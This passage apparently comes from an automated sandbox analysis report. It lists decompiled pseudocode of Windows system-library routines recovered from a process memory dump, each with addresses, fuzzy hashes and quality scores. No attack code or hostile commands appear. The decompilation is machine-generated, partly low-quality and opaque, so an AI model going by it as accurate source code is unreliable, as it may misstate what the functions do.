							if(_t38 != 0) {
								if(_t21 != 0) {
									E04957016(_a8, 0, 0, 0,  &_v36,  &_v28);
									L048F2400( &_v52);
								}
								_t21 = L048F2400( &_v28);
							}
						}
					}
				}
				return _t21;
			}

0x04956cfb
0x04956d00
0x04956d02
0x04956d06
0x04956d0a
0x04956d0e
0x04956d19
0x04956d2b
0x04956d1b
0x04956d24
0x04956d24
0x04956d33
0x04956d39
0x04956d46
0x04956d4f
0x04956d61
0x04956d51
0x04956d5a
0x04956d5a
0x04956d69
0x04956d6b
0x04956d6d
0x04956d6f
0x04956d6f
0x04956d74
0x04956d79
0x04956d7a
0x04956d7f
0x04956d82
0x04956d88
0x04956d89
0x04956d90
0x04956d94
0x04956da7
0x04956db1
0x04956db1
0x04956dbb
0x04956dbb
0x04956d90
0x04956d69
0x04956d46
0x04956dc6

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90b04be7e066ab17b6b090e110c0282fb074e9b0dee6efc3d782a6c856fc89e4
Instruction ID: 1c6485e17761e1c8636003b650f1ebb8a6a2cc26d0a571e544fb7774d36c78e8
Opcode Fuzzy Hash: 90b04be7e066ab17b6b090e110c0282fb074e9b0dee6efc3d782a6c856fc89e4
Instruction Fuzzy Hash: 6F21CF725002449BE721EF68CD44B6BB7ECAF81754F540D66AD44C7261E774EA08C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 049A070D, Relevance: .1, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E049A070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				char _v8;
				intOrPtr _v11;
				signed int _v12;
				intOrPtr _v15;
				signed int _v16;
				intOrPtr _v28;
				void* __ebx;
				char* _t32;
				signed int* _t38;
				signed int _t60;

				_t38 = __ecx;
				_v16 = __edx;
				_t60 = E049A07DF(__ecx, __edx,  &_a4,  &_a8, 2);
				if(_t60 != 0) {
					_t7 = _t38 + 0x38; // 0x29cd5903
					_push( *_t7);
					_t9 = _t38 + 0x34; // 0x6adeeb00
					_push( *_t9);
					_v12 = _a8 << 0xc;
					_t11 = _t38 + 4; // 0x5de58b5b
					_push(0x4000);
					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
					E0499AFDE( &_v8,  &_v12);
					E049A1293(_t38, _v28, _t60);
					if(E048F7D50() == 0) {
						_t32 = 0x7ffe0380;
					} else {
						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						_t21 = _t38 + 0x3c; // 0xc3595e5f
						E049914FB(_t38,  *_t21, _v11, _v15, 0xd);
					}
				}
				return  ~_t60;
			}

0x049a071b
0x049a0724
0x049a0734
0x049a0738
0x049a074b
0x049a074b
0x049a0753
0x049a0753
0x049a0759
0x049a075d
0x049a0774
0x049a0779
0x049a077d
0x049a0789
0x049a0795
0x049a07a7
0x049a0797
0x049a07a0
0x049a07a0
0x049a07af
0x049a07c4
0x049a07cd
0x049a07cd
0x049a07af
0x049a07dc

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
Instruction ID: 9a91f094a79db8b37e7fac63670b1f75eebcdead7e902fca26bbe5c87f773241
Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
Instruction Fuzzy Hash: A421F2362042009FE715DF18CC80B6ABBA9FBC4354F048679F9958B385D730ED19CB91

Uniqueness

Uniqueness Score: -1.00%

Function 048FAE73, Relevance: .1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E048FAE73(intOrPtr __ecx, void* __edx) {
				intOrPtr _v8;
				void* _t19;
				char* _t22;
				signed char* _t24;
				intOrPtr _t25;
				intOrPtr _t27;
				void* _t31;
				intOrPtr _t36;
				char* _t38;
				signed char* _t42;

				_push(__ecx);
				_t31 = __edx;
				_v8 = __ecx;
				_t19 = E048F7D50();
				_t38 = 0x7ffe0384;
				if(_t19 != 0) {
					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t22 = 0x7ffe0384;
				}
				_t42 = 0x7ffe0385;
				if( *_t22 != 0) {
					if(E048F7D50() == 0) {
						_t24 = 0x7ffe0385;
					} else {
						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t24 & 0x00000010) != 0) {
						goto L17;
					} else {
						goto L3;
					}
				} else {
					L3:
					_t27 = E048F7D50();
					if(_t27 != 0) {
						_t27 =  *[fs:0x30];
						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
					}
					if( *_t38 != 0) {
						_t27 =  *[fs:0x30];
						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						_t27 = E048F7D50();
						if(_t27 != 0) {
							_t27 =  *[fs:0x30];
							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
						}
						if(( *_t42 & 0x00000020) != 0) {
							L17:
							_t25 = _v8;
							_t36 = 0;
							if(_t25 != 0) {
								_t36 =  *((intOrPtr*)(_t25 + 0x18));
							}
							_t27 = E04957794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
						}
						goto L5;
					} else {
						L5:
						return _t27;
					}
				}
			}

0x048fae78
0x048fae7c
0x048fae7e
0x048fae81
0x048fae86
0x048fae8d
0x04942691
0x048fae93
0x048fae93
0x048fae93
0x048fae98
0x048fae9d
0x049426a2
0x049426b4
0x049426a4
0x049426ad
0x049426ad
0x049426b9
0x00000000
0x049426bb
0x00000000
0x049426bb
0x048faea3
0x048faea3
0x048faea3
0x048faeaa
0x049426c0
0x049426c9
0x049426c9
0x048faeb3
0x049426d4
0x049426e1
0x00000000
0x00000000
0x049426e7
0x049426ee
0x049426f0
0x049426f9
0x049426f9
0x04942702
0x04942708
0x04942708
0x0494270b
0x0494270f
0x04942711
0x04942711
0x04942725
0x04942725
0x00000000
0x048faeb9
0x048faeb9
0x048faebf
0x048faebf
0x048faeb3

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
Instruction ID: d6d795ba07c0e227842424ab032e6827ace7f1b6ed06bcd0176f80f0a137935d
Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
Instruction Fuzzy Hash: 7521C231A016849FEB159B69C944F2577E8BF84394F1905F2EE08CB6A2E774FC40C691

Uniqueness

Uniqueness Score: -1.00%

Function 04957794, Relevance: .1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E04957794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t21;
				void* _t24;
				intOrPtr _t25;
				void* _t36;
				short _t39;
				signed char* _t42;
				unsigned int _t46;
				void* _t50;

				_push(__ecx);
				_push(__ecx);
				_t21 =  *0x49c7b9c; // 0x0
				_t46 = _a8;
				_v12 = __edx;
				_v8 = __ecx;
				_t4 = _t46 + 0x2e; // 0x2e
				_t36 = _t4;
				_t24 = L048F4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
				_t50 = _t24;
				if(_t50 != 0) {
					_t25 = _a4;
					if(_t25 == 5) {
						L3:
						_t39 = 0x14b1;
					} else {
						_t39 = 0x14b0;
						if(_t25 == 6) {
							goto L3;
						}
					}
					 *((short*)(_t50 + 6)) = _t39;
					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
					_t11 = _t50 + 0x2c; // 0x2c
					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
					E0491F3E0(_t11, _a12, _t46);
					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
					if(E048F7D50() == 0) {
						_t42 = 0x7ffe0384;
					} else {
						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t50);
					_t19 = _t36 - 0x20; // 0xe
					_push(0x403);
					_push( *_t42 & 0x000000ff);
					E04919AE0();
					_t24 = L048F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
				}
				return _t24;
			}

0x04957799
0x0495779a
0x0495779b
0x049577a3
0x049577ab
0x049577ae
0x049577b1
0x049577b1
0x049577bf
0x049577c4
0x049577c8
0x049577ce
0x049577d4
0x049577e0
0x049577e0
0x049577d6
0x049577d6
0x049577de
0x00000000
0x00000000
0x049577de
0x049577e5
0x049577f0
0x049577f3
0x049577f6
0x049577fd
0x04957800
0x0495780c
0x04957818
0x0495782b
0x0495781a
0x04957823
0x04957823
0x04957830
0x04957831
0x04957838
0x0495783d
0x0495783e
0x0495784f
0x0495784f
0x0495785a

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c15dd24b473eeff87dc9eacef68804eb4fd1afa7006d8a045fc5e8e185120201
Instruction ID: 6562bf0d7add784ed790d73f2d751cfd0daa0156dc3af227e0b6b89957dbb588
Opcode Fuzzy Hash: c15dd24b473eeff87dc9eacef68804eb4fd1afa7006d8a045fc5e8e185120201
Instruction Fuzzy Hash: 17216F72500644ABD725DFA9DC90E6BBBBDEF88740F104569EA0AD7760D634EA00CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0490FD9B, Relevance: .1, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0490FD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				intOrPtr _v8;
				void* _t19;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t40;

				_t35 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t37 = 0;
				_v8 = __edx;
				_t29 = __ecx;
				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
					L3:
					_t19 = _a4 - 4;
					if(_t19 != 0) {
						if(_t19 != 1) {
							L7:
							return _t37;
						}
						if(_t35 == 0) {
							L11:
							_t37 = 0xc000000d;
							goto L7;
						}
						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
							L048F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
							_t35 = _v8;
						}
						 *((intOrPtr*)(_t40 + 4)) = _t35;
						goto L7;
					}
					if(_t29 == 0) {
						goto L11;
					}
					_t32 =  *_t40;
					if(_t32 != 0) {
						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
						E048E76E2( *_t40);
					}
					 *_t40 = _t29;
					goto L7;
				}
				_t40 = L048F4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
				if(_t40 == 0) {
					_t37 = 0xc0000017;
					goto L7;
				}
				_t35 = _v8;
				 *_t40 = 0;
				 *((intOrPtr*)(_t40 + 4)) = 0;
				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
				goto L3;
			}

0x0490fd9b
0x0490fda0
0x0490fda1
0x0490fdab
0x0490fdad
0x0490fdb0
0x0490fdb8
0x0490fe0f
0x0490fde6
0x0490fde9
0x0490fdec
0x0494c0c0
0x0490fdfe
0x0490fe06
0x0490fe06
0x0494c0c8
0x0490fe2d
0x0490fe2d
0x00000000
0x0490fe2d
0x0494c0d1
0x0494c0e0
0x0494c0e5
0x0494c0e5
0x0494c0e8
0x00000000
0x0494c0e8
0x0490fdf4
0x00000000
0x00000000
0x0490fdf6
0x0490fdfa
0x0490fe1a
0x0490fe1f
0x0490fe1f
0x0490fdfc
0x00000000
0x0490fdfc
0x0490fdcc
0x0490fdd0
0x0490fe26
0x00000000
0x0490fe26
0x0490fdd8
0x0490fddb
0x0490fddd
0x0490fde0
0x00000000

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
Instruction ID: 64b47a323c0dc94fa03ddf9b7f39227f94b978b6cd2e6b8b1779be517cfa194c
Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
Instruction Fuzzy Hash: D721BE72600A40DFDB30CF09C540E62F7E9EB94B10F21857EE94587669E7B0BE00DB80

Uniqueness

Uniqueness Score: -1.00%

Function 048D9240, Relevance: .1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E048D9240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t41;
				intOrPtr* _t46;
				void* _t48;
				intOrPtr _t50;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				void* _t66;
				void* _t68;

				_push(0xc);
				_push(0x49af708);
				E0492D08C(__ebx, __edi, __esi);
				_t65 = __ecx;
				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
				if( *(__ecx + 0x24) != 0) {
					_push( *(__ecx + 0x24));
					E049195D0();
					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
				}
				L6();
				L6();
				_push( *((intOrPtr*)(_t65 + 0x28)));
				E049195D0();
				_t33 =  *0x49c84c4; // 0x0
				L048F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
				_t37 =  *0x49c84c4; // 0x0
				L048F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
				_t41 =  *0x49c84c4; // 0x0
				E048F2280(L048F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x49c86b4);
				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
				_t46 = _t65 + 0xe8;
				_t62 =  *_t46;
				_t60 =  *((intOrPtr*)(_t46 + 4));
				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
					_t61 = 3;
					asm("int 0x29");
					_push(_t65);
					_t66 = _t61;
					_t23 = _t66 + 0x14; // 0x8df8084c
					_push( *_t23);
					E049195D0();
					_t24 = _t66 + 0x10; // 0x89e04d8b
					_push( *_t24);
					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
					_t48 = E049195D0();
					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
					return _t48;
				} else {
					 *_t60 = _t62;
					 *((intOrPtr*)(_t62 + 4)) = _t60;
					 *(_t68 - 4) = 0xfffffffe;
					E048D9325();
					_t50 =  *0x49c84c4; // 0x0
					return E0492D0D1(L048F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
				}
			}

0x048d9240
0x048d9242
0x048d9247
0x048d924c
0x048d924e
0x048d9255
0x048d9257
0x048d925a
0x048d925f
0x048d925f
0x048d9266
0x048d9271
0x048d9276
0x048d9279
0x048d927e
0x048d9295
0x048d929a
0x048d92b1
0x048d92b6
0x048d92d7
0x048d92dc
0x048d92e0
0x048d92e6
0x048d92e8
0x048d92ee
0x048d9332
0x048d9333
0x048d9337
0x048d9338
0x048d933a
0x048d933a
0x048d933d
0x048d9342
0x048d9342
0x048d9345
0x048d9349
0x048d934e
0x048d9352
0x048d9357
0x048d92f4
0x048d92f4
0x048d92f6
0x048d92f9
0x048d9300
0x048d9306
0x048d9324
0x048d9324

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: efc945ba46b20282a23bf4de012371349b53432957b60a8b4301f4bbb8a2e0c5
Instruction ID: 4ccae7e3feb09d451f7fb75bdc8023c8bf5a7709b3e1ce8ca24a48c4a31bd2ba
Opcode Fuzzy Hash: efc945ba46b20282a23bf4de012371349b53432957b60a8b4301f4bbb8a2e0c5
Instruction Fuzzy Hash: 7B212572052A00DFD725EF68CA40F5ABBB9FF08708F144A68E14AD66B1CB74F941CB85

Uniqueness

Uniqueness Score: -1.00%

Function 0490B390, Relevance: .1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E0490B390(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed char _t12;
				signed int _t16;
				signed int _t21;
				void* _t28;
				signed int _t30;
				signed int _t36;
				signed int _t41;

				_push(__ecx);
				_t41 = _a4 + 0xffffffb8;
				E048F2280(_t12, 0x49c8608);
				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
				asm("sbb edi, edi");
				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
				_v8 = _t36;
				asm("lock cmpxchg [ebx], ecx");
				_t30 = 1;
				if(1 != 1) {
					while(1) {
						_t21 = _t30 & 0x00000006;
						_t16 = _t30;
						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
						asm("lock cmpxchg [edi], esi");
						if(_t16 == _t30) {
							break;
						}
						_t30 = _t16;
					}
					_t36 = _v8;
					if(_t21 == 2) {
						_t16 = E049100C2(0x49c8608, 0, _t28);
					}
				}
				if(_t36 != 0) {
					_t16 = L048F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
				}
				return _t16;
			}

0x0490b395
0x0490b3a2
0x0490b3a5
0x0490b3aa
0x0490b3b2
0x0490b3ba
0x0490b3bd
0x0490b3c0
0x0490b3c4
0x0490b3c9
0x0494a3e9
0x0494a3ed
0x0494a3f0
0x0494a3ff
0x0494a403
0x0494a409
0x00000000
0x00000000
0x0494a40b
0x0494a40b
0x0494a40f
0x0494a415
0x0494a423
0x0494a423
0x0494a415
0x0490b3d1
0x0490b3e8
0x0490b3e8
0x0490b3d9

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 46daf0addd96704331435e55fd79add112a69f88559abcce1694042ad52ce98a
Instruction ID: 3dbfea8cff9c4b04be883e4e03f2130b9b1440b6fac80de1c43140e3d86ab5ab
Opcode Fuzzy Hash: 46daf0addd96704331435e55fd79add112a69f88559abcce1694042ad52ce98a
Instruction Fuzzy Hash: 5B1125323162209FDB18DA54DE81A6B729BEBC5334B34453DD916D73C0DA31BC02C695

Uniqueness

Uniqueness Score: -1.00%

Function 04964257, Relevance: .1, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E04964257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t18;
				intOrPtr _t24;
				intOrPtr* _t27;
				intOrPtr* _t30;
				intOrPtr* _t31;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr* _t35;
				void* _t37;
				void* _t38;
				void* _t39;
				void* _t43;

				_t39 = __eflags;
				_t35 = __edi;
				_push(8);
				_push(0x49b08d0);
				E0492D08C(__ebx, __edi, __esi);
				_t37 = __ecx;
				E049641E8(__ebx, __edi, __ecx, _t39);
				E048EEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
				_t18 = _t37 + 8;
				_t33 =  *_t18;
				_t27 =  *((intOrPtr*)(_t18 + 4));
				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
					L8:
					_push(3);
					asm("int 0x29");
				} else {
					 *_t27 = _t33;
					 *((intOrPtr*)(_t33 + 4)) = _t27;
					_t35 = 0x49c87e4;
					_t18 =  *0x49c87e0; // 0x0
					while(_t18 != 0) {
						_t43 = _t18 -  *0x49c5cd0; // 0xffffffff
						if(_t43 >= 0) {
							_t31 =  *0x49c87e4; // 0x0
							_t18 =  *_t31;
							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
								goto L8;
							} else {
								 *0x49c87e4 = _t18;
								 *((intOrPtr*)(_t18 + 4)) = _t35;
								L048D7055(_t31 + 0xfffffff8);
								_t24 =  *0x49c87e0; // 0x0
								_t18 = _t24 - 1;
								 *0x49c87e0 = _t18;
								continue;
							}
						}
						goto L9;
					}
				}
				L9:
				__eflags =  *0x49c5cd0;
				if( *0x49c5cd0 <= 0) {
					L048D7055(_t37);
				} else {
					_t30 = _t37 + 8;
					_t34 =  *0x49c87e8; // 0x0
					__eflags =  *_t34 - _t35;
					if( *_t34 != _t35) {
						goto L8;
					} else {
						 *_t30 = _t35;
						 *((intOrPtr*)(_t30 + 4)) = _t34;
						 *_t34 = _t30;
						 *0x49c87e8 = _t30;
						 *0x49c87e0 = _t18 + 1;
					}
				}
				 *(_t38 - 4) = 0xfffffffe;
				return E0492D0D1(L04964320());
			}

0x04964257
0x04964257
0x04964257
0x04964259
0x0496425e
0x04964263
0x04964265
0x04964273
0x04964278
0x0496427c
0x0496427f
0x04964281
0x04964287
0x049642d7
0x049642d7
0x049642da
0x0496428d
0x0496428d
0x0496428f
0x04964292
0x04964297
0x0496429c
0x049642a0
0x049642a6
0x049642a8
0x049642ae
0x049642b3
0x00000000
0x049642ba
0x049642ba
0x049642bf
0x049642c5
0x049642ca
0x049642cf
0x049642d0
0x00000000
0x049642d0
0x049642b3
0x00000000
0x049642a6
0x0496429c
0x049642dc
0x049642dc
0x049642e3
0x04964309
0x049642e5
0x049642e5
0x049642e8
0x049642ee
0x049642f0
0x00000000
0x049642f2
0x049642f2
0x049642f4
0x049642f7
0x049642f9
0x04964300
0x04964300
0x049642f0
0x0496430e
0x0496431f

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 896a5e6a3452e4f5ad303c1b0d4a86d3bb6772d9fbddd7c5cf5a61bbdba9fe2e
Instruction ID: f5a1dbe2786cb31b74a1d4d05776d15293b46f7059b067d939050f3f8dc1bcd6
Opcode Fuzzy Hash: 896a5e6a3452e4f5ad303c1b0d4a86d3bb6772d9fbddd7c5cf5a61bbdba9fe2e
Instruction Fuzzy Hash: F6216A70585601DFD714EFA9D500A14BBF5FB85399B20867EC1068B698EB39E881CB45

Uniqueness

Uniqueness Score: -1.00%

Function 049546A7, Relevance: .1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E049546A7(signed short* __ecx, unsigned int __edx, char* _a4) {
				signed short* _v8;
				unsigned int _v12;
				intOrPtr _v16;
				signed int _t22;
				signed char _t23;
				short _t32;
				void* _t38;
				char* _t40;

				_v12 = __edx;
				_t29 = 0;
				_v8 = __ecx;
				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				_t38 = L048F4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
				if(_t38 != 0) {
					_t40 = _a4;
					 *_t40 = 1;
					E0491F3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
					_t22 = _v12 >> 1;
					_t32 = 0x2e;
					 *((short*)(_t38 + _t22 * 2)) = _t32;
					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
					_t23 = E0490D268(_t38, 1);
					asm("sbb al, al");
					 *_t40 =  ~_t23 + 1;
					L048F77F0(_v16, 0, _t38);
				} else {
					 *_a4 = 0;
					_t29 = 0xc0000017;
				}
				return _t29;
			}

0x049546b7
0x049546ba
0x049546c5
0x049546c8
0x049546d0
0x049546d4
0x049546e6
0x049546e9
0x049546f4
0x049546ff
0x04954705
0x04954706
0x0495470c
0x04954713
0x0495471b
0x04954723
0x04954725
0x049546d6
0x049546d9
0x049546db
0x049546db
0x04954732

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
Instruction ID: 78b3078a3b3c42664953652fb282197b77490a9646fa07bb068072c3a7caa3e5
Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
Instruction Fuzzy Hash: C3112572504208BFDB059F5CD8809BEB7B9EF95304F10806AF944C7350DA31AD51D7A5

Uniqueness

Uniqueness Score: -1.00%

Function 04902397, Relevance: .1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 34%

			E04902397(intOrPtr _a4) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t11;
				void* _t19;
				void* _t25;
				void* _t26;
				intOrPtr _t27;
				void* _t28;
				void* _t29;

				_t27 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
				if( *0x49c848c != 0) {
					L048FFAD0(0x49c8610);
					if( *0x49c848c == 0) {
						E048FFA00(0x49c8610, _t19, _t27, 0x49c8610);
						goto L1;
					} else {
						_push(0);
						_push(_a4);
						_t26 = 4;
						_t29 = E04902581(0x49c8610, 0x48b50a0, _t26, _t27, _t28);
						E048FFA00(0x49c8610, 0x48b50a0, _t27, 0x49c8610);
					}
				} else {
					L1:
					_t11 =  *0x49c8614; // 0x1
					if(_t11 == 0) {
						_t11 = E04914886(0x48b1088, 1, 0x49c8614);
					}
					_push(0);
					_push(_a4);
					_t25 = 4;
					_t29 = E04902581(0x49c8610, (_t11 << 4) + 0x48b5070, _t25, _t27, _t28);
				}
				if(_t29 != 0) {
					 *((intOrPtr*)(_t29 + 0x38)) = _t27;
					 *((char*)(_t29 + 0x40)) = 0;
				}
				return _t29;
			}

0x049023b0
0x049023b6
0x04902409
0x04902415
0x04945ae9
0x00000000
0x0490241b
0x0490241b
0x0490241d
0x04902427
0x0490242e
0x04902430
0x04902430
0x049023b8
0x049023b8
0x049023b8
0x049023bf
0x049023fc
0x049023fc
0x049023c1
0x049023c3
0x049023d0
0x049023d8
0x049023d8
0x049023dc
0x049023de
0x049023e1
0x049023e1
0x049023ec

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07edde38e36fcb49a0b594e0b1998ff754aa42054b333040d18cfd85ccc62906
Instruction ID: c4e5350e09506e8b412c63893c47a7e8b266bfb4775c971e45777115a0a2c754
Opcode Fuzzy Hash: 07edde38e36fcb49a0b594e0b1998ff754aa42054b333040d18cfd85ccc62906
Instruction Fuzzy Hash: 781129313047006FF720AB299C44B19768DEB90A59F148976E706E72C0D5B4FC418756

Uniqueness

Uniqueness Score: -1.00%

Function 049137F5, Relevance: .1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E049137F5(void* __ecx, intOrPtr* __edx) {
				void* __ebx;
				void* __edi;
				signed char _t6;
				intOrPtr _t13;
				intOrPtr* _t20;
